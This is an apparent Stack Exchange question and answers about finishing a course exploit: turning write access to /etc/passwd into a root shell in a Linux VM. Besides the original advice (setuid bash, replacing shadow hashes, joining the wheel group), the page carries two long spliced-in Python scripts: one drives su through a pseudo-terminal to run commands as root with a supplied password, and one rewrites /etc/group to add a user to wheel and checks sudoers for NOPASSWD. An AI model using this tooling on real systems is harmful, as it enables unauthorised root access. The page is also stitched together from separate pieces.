2

I am working on an exploit for a security course. The object is to obtain a root shell in a Linux virtual machine. So far, I can write to /etc/passwd and change root's password to an arbitrary string.

Now, I want to use su to get the root shell. Since my exploit has to be automated, it can't prompt for a password, and the VM doesn't have expect installed. Does anybody have any idea how I can pass the password to the su command? Or is there a better way?

Oliver Salzburg
  • 86,445
  • 63
  • 260
  • 306
noobler
  • 157
  • 2
  • 5
  • 1
    If you are able to write to /etc/passwd, then surely you have already elevated to root? In that case, couldn't you setuid on /bin/bash and run it? – Paul Jan 24 '12 at 22:50
  • I don't have root on the VM. We are to exploit a given backup program that has setuid set. By passing it malicious arguments I can get it to change the owner of /etc/passwd. – noobler Jan 25 '12 at 03:16
  • Can you pass the setuid process malicious arguments to do a setuid on /bin/bash? – Paul Jan 25 '12 at 03:31
  • @noobler Do you have the source for the backup program? If not, you need to find a buffer overflow by trial and error. `su` opens /dev/tty to read the password. You need to find a way to persuade `su` to use your very own /dev/tty. – ott-- May 23 '12 at 20:35
  • If you can have the setuid program call `chmod` to change permissions of /etc/password as root, why can't you just have the setuid program call `/bin/bash` to spawn a root shell? – LawrenceC Jul 21 '20 at 17:13

2 Answers

0

The best way to automate this type of input is using expect, or better pexpect. Most servers come with Python, at least with a modern distribution.

First off, you said your VM does not have expect installed? I'm not sure why that matters. Is there any reason why you cannot install/execute something under your local account?

Next consideration: why must you even use passwd? You can also change a password by replacing the hash specified in /etc/shadow. You obviously would need to correctly pregenerate a hash first, but as long as you use a supported one, it should work as expected. Now, how you would script such an action is an exercise for you to work out.

I also want to mention that passwd does not read its input from STDIN. If I'm not mistaken, it reads from a tty. So no fancy combo of just echo and sleep would work. However, it's possible using a HEREDOC, but that assumes the system is sufficiently responsive. You may be able to break it up and sleep between entries. I just tested this; it worked on my Ubuntu workstation.

```bash
#!/bin/bash
# Run as root: only root is spared the "current password" prompt, so the
# two heredoc lines answer "New password:" and "Retype new password:".
passwd root <<'EOF'
newpassword
newpassword
EOF
```
J. M. Becker
  • 633
  • 6
  • 15
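The answer above points at pexpect, but the question is how to drive `su` when no expect-style tool is installed. The following is an added example, not part of J. M. Becker's answer: a stdlib-only driver that gives `su` a pseudo-terminal and answers its prompt, which is the part of expect that matters here, because `su` (like Python's `getpass()`) opens `/dev/tty` directly and ignores a piped stdin. It assumes `su` is on PATH and prompts with `Password:` (adjust `PROMPT_RE` for a localised prompt); `run_under_pty`, `su_root` and `drive_getpass` are names chosen for this example, and `drive_getpass` is a root-free self-test that exercises the same `/dev/tty` behaviour.

```python
#!/usr/bin/env python3
"""Answer a /dev/tty password prompt (as su does) without expect.

Added example, not from the original answer. Assumes `su` is on PATH and
prompts with "Password:"; adjust PROMPT_RE for a localised prompt.
"""
import os
import pty
import re
import select
import sys
import time

PROMPT_RE = rb"[Pp]assword:"   # assumption: what su prints before reading


def run_under_pty(argv, prompt_re, response, timeout=10.0):
    """Spawn argv with a pseudo-terminal as its controlling tty, reply to the
    first output matching prompt_re with response + newline, and return
    (wait_status, transcript_bytes). A pipe would not work: su and getpass()
    open /dev/tty directly, which is why `echo pw | su` fails."""
    pid, master_fd = pty.fork()
    if pid == 0:
        # Child: stdin/stdout/stderr and /dev/tty are all the pty slave.
        os.execvp(argv[0], argv)
    transcript = b""
    answered = False
    deadline = time.monotonic() + timeout
    try:
        while True:
            remaining = deadline - time.monotonic()
            if remaining <= 0:
                os.kill(pid, 9)  # give up rather than hang the exploit
                break
            ready, _, _ = select.select([master_fd], [], [], remaining)
            if not ready:
                continue
            try:
                chunk = os.read(master_fd, 4096)
            except OSError:
                break  # Linux raises EIO once the child closes the slave
            if not chunk:
                break
            transcript += chunk
            if not answered and re.search(prompt_re, transcript):
                os.write(master_fd, response.encode() + b"\n")
                answered = True
    finally:
        os.close(master_fd)
    _, status = os.waitpid(pid, 0)
    return status, transcript


def exit_code(status):
    """Translate a waitpid status into an exit code (-signal if killed)."""
    if os.WIFEXITED(status):
        return os.WEXITSTATUS(status)
    return -os.WTERMSIG(status)


def su_root(password, command):
    """Run `command` as root via su, feeding `password` at the tty prompt.
    Returns (exit_code, transcript). Assumption: su prompts 'Password:'."""
    status, out = run_under_pty(["su", "-c", command, "root"], PROMPT_RE, password)
    return exit_code(status), out


def drive_getpass(secret):
    """Root-free self-test: Python's getpass() reads /dev/tty exactly the way
    su does, so this proves the pty trick without touching su at all."""
    argv = [sys.executable, "-c",
            "import getpass; print('GOT:' + getpass.getpass('Password: '))"]
    status, out = run_under_pty(argv, PROMPT_RE, secret)
    return exit_code(status), out


if __name__ == "__main__":
    code, out = drive_getpass("s3cret")
    print("getpass self-test exit", code, "transcript", out)
    if len(sys.argv) == 3:          # usage: script.py <root password> <command>
        code, out = su_root(sys.argv[1], sys.argv[2])
        print("su exit", code)
        print(out.decode(errors="replace"))
```

The timeout matters in an automated exploit: if the prompt text differs from `PROMPT_RE`, `su` would otherwise sit waiting on the tty forever, so the driver kills the child and returns a negative exit code instead of hanging.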
-2

Your exploit could also write to the groups file and make the current user part of the 'wheel' group (or whatever group can run sudo commands w/o a password). Then you'll be able to sudo su root (or any other user) w/o a password.

Running visudo should give you some direction on the setup of the 'wheel' group on your machine.

To clarify: once a user becomes part of the wheel group, they can run sudo commands without needing a password.

CamelBlues
  • 285
  • 1
  • 4
  • 12
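As an added example (not part of CamelBlues' answer), here is the /etc/group edit the answer describes, done as a pure text transform on the `name:password:gid:member,member` format, plus the check a practitioner would want first: group membership only skips the sudo password when the matching sudoers rule carries the `NOPASSWD:` tag, so the second function scans sudoers text for that. The sample group and sudoers contents are constructed for the self-test, and `add_user_to_group`, `group_has_nopasswd_sudo` and `patch_group_file` are names chosen here.

```python
#!/usr/bin/env python3
"""Add a user to a group in /etc/group text and check whether that group
really gets password-less sudo. Added example, not from the answer above."""
import re

# Constructed sample files for the self-test (not from any real host).
SAMPLE_GROUP = (
    "root:x:0:\n"
    "wheel:x:10:alice\n"
    "sudo:x:27:\n"
    "noobler:x:1000:\n"
)
SAMPLE_SUDOERS_NOPASSWD = "%wheel ALL=(ALL) NOPASSWD: ALL\n"
SAMPLE_SUDOERS_PASSWD = "# %wheel ALL=(ALL) NOPASSWD: ALL\n%wheel ALL=(ALL) ALL\n"


def add_user_to_group(group_text, group, user):
    """Return group_text with `user` appended to the member list of `group`.
    /etc/group lines are name:password:gid:member1,member2; the edit is
    idempotent and leaves every other line byte-for-byte unchanged."""
    out = []
    found = False
    for line in group_text.splitlines():
        fields = line.split(":")
        if len(fields) == 4 and fields[0] == group:
            found = True
            members = [m for m in fields[3].split(",") if m]
            if user not in members:
                members.append(user)
            fields[3] = ",".join(members)
            line = ":".join(fields)
        out.append(line)
    if not found:
        raise KeyError(f"group {group!r} not present")
    return "\n".join(out) + "\n"


def group_has_nopasswd_sudo(sudoers_text, group):
    """True if an uncommented sudoers rule for %group carries NOPASSWD:.
    Membership in wheel alone does not skip the password; only this tag does."""
    rule = re.compile(r"^\s*%" + re.escape(group) + r"\s+\S+\s*=.*\bNOPASSWD:")
    for line in sudoers_text.splitlines():
        if line.lstrip().startswith("#"):
            continue
        if rule.search(line):
            return True
    return False


def patch_group_file(path, group, user):
    """Rewrite the group file at `path` in place (needs write access to it).
    Returns True if the file changed."""
    with open(path, "r", encoding="utf-8") as fh:
        text = fh.read()
    new_text = add_user_to_group(text, group, user)
    with open(path, "w", encoding="utf-8") as fh:
        fh.write(new_text)
    return new_text != text


if __name__ == "__main__":
    print(add_user_to_group(SAMPLE_GROUP, "wheel", "noobler"), end="")
    print("wheel is NOPASSWD:", group_has_nopasswd_sudo(SAMPLE_SUDOERS_NOPASSWD, "wheel"))
    print("wheel is NOPASSWD:", group_has_nopasswd_sudo(SAMPLE_SUDOERS_PASSWD, "wheel"))
```

Note that a new group membership only takes effect in a fresh login session (or via `newgrp`), and that on a box where `/etc/group` is writable the same primitive usually makes `/etc/sudoers` worth a look as well.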